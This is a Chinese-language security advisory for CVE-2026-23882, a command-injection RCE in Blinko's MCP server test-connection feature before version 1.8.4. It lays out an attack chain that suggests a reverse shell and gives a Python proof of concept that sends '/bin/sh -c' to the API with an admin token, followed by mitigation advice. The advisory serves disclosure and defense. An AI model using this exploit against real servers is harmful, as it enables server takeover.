CVE-2026-23882 CVSS 7.2 高危

CVE-2026-23882 Blinko远程代码执行漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-23882

漏洞类型

远程代码执行

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Blinko

漏洞概述

Blinko是一款AI驱动的笔记应用。在1.8.4版本之前，其MCP服务器创建功能存在安全缺陷。攻击者可利用该漏洞指定任意命令和参数，并在测试连接时触发执行，从而导致远程代码执行。该漏洞已在1.8.4版本中修复。

技术细节

该漏洞源于Blinko在实现MCP（Model Context Protocol）服务器创建功能时，未对用户输入的命令和参数进行严格的过滤和验证。在受影响的版本中（1.8.4之前），拥有高权限的攻击者可以在创建MCP服务器时注入任意操作系统命令。当用户点击“测试连接”功能时，应用程序会调用系统执行接口，直接运行攻击者预设的恶意指令。由于系统缺乏沙箱隔离或权限限制，这些命令将在服务器上下文中以应用程序权限运行，导致服务器被完全控制。CVSS向量显示攻击需要高权限（PR:H），意味着攻击者通常需要先获得管理员或特权账户访问权限。

攻击链分析

STEP 1

1. 权限获取

攻击者需要获取Blinko应用的高权限账户（如管理员账户）访问权限。

STEP 2

2. 访问功能

登录后台，访问MCP（Model Context Protocol）服务器创建或配置页面。

STEP 3

3. 注入命令

在服务器配置中，将命令字段设置为恶意的系统命令（如反弹Shell），并将参数字段设置为相应的执行参数。

STEP 4

4. 触发执行

点击“测试连接”按钮，应用程序后端会直接调用系统接口执行预设的恶意命令。

STEP 5

5. 获得控制

恶意命令在服务器端运行，攻击者从而获得服务器控制权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-ip/api/mcp/test-connection"

# Malicious command payload (e.g., creating a file)
payload = {
    "serverName": "Exploit",
    "command": "/bin/sh",
    "args": "-c 'touch /tmp/poc_success'"
}

# Headers with Admin token (PR:H required)
headers = {
    "Authorization": "Bearer <ADMIN_TOKEN>",
    "Content-Type": "application/json"
}

# Send request to trigger the vulnerability
response = requests.post(url, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] PoC executed successfully. Check /tmp/poc_success")
else:
    print("[-] Failed to execute PoC")

影响范围

Blinko < 1.8.4

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用MCP服务器创建与测试功能，并通过WAF或防火墙规则限制对相关API端点的非必要访问，同时加强对管理员账户的监控，防止凭证泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表